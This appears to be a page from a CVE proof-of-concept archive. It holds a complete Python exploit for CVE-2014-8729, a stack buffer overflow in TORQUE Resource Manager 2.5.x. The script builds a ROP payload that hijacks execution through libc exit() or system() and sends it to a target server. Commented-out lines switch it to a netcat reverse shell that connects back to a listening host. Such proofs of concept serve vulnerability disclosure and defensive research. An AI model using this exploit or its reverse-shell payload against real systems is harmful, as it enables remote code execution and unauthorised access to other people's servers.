4837 Total CVEs
26 Years
GitHub
Home / 2014 / CVE-2014-8729
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow
# Date: 10 Nov 2014
# Exploit Author: @inso - Moussajee Thomas, @socks - Laurenceau Gary
# Vulnerability discovered by: Moussajee Thomas, Laurenceau Gary
# CVE: CVE-2014-8729, CVE-2014-8787
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version tested: 2.5.12
# Version affected : 2.5.x - 2.5.13
# Tested on: Debian 32bit with ASLR disabled

# ROP on exit(42) with control of EAX register
# can be customisable (uncoment line) for reverse shellcode execution if NX is disabled

import socket
import sys
import struct

def off(o):
	return struct.pack('I',o)

plt = {
	'exit'	: off(0xb7dd8270),
	'system': off(0xb7de4c30),
}

if (len(sys.argv) == 3):
	ip = sys.argv[1]
  	port = sys.argv[2]
if (len(sys.argv) == 2):
	ip = sys.argv[1]
	port = 15001
else:
	ip = "192.168.211.145"
	port = 15001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
  
offset = 143										# number to read
header = str(len(str(offset))) + str(offset) + '1' 	#header dis protocol torque

packet = header
packet += 'c' * 60					# padding
packet += plt['exit']				# set EIP  to exit() address (comment for bin/sh execution) may diffear print exit on gdb
#packet += plt['system']			# set EIP to system() address (uncoment for bin/sh execution) may diffear print system on gdb	
packet += 'a' * 4                   # padding
packet += chr(42) 		           	# set EAX to 42 '*' (comment for bin/sh execution)
# #packet += ('\xb4\x5f\xee\xb7')  	# set EAX on  "/bin/sh" address on libc (uncoment for bin/sh execution) may diffear find [system address], +999999999999, "/bin/sh" on gdb
#packet += (0x8bd5930 + (len(packet) + 1 - len(header))  # EAX on buffer address + 68 for set at "netcat"
#packet = 'nc -e /bin/sh 192.168.1.19 1337' + '\x00' # reverse shell and set null at the end of the string
packet += 'b' * (148 - len(packet)) # padding (comment for bin/sh execution)

print "sending buffer to " + ip + ':' + str(port)
print "size : " + str(len(packet)) 					# 148 if offset = 143
#print packet.encode("hex")
s.sendall(packet)
s.close()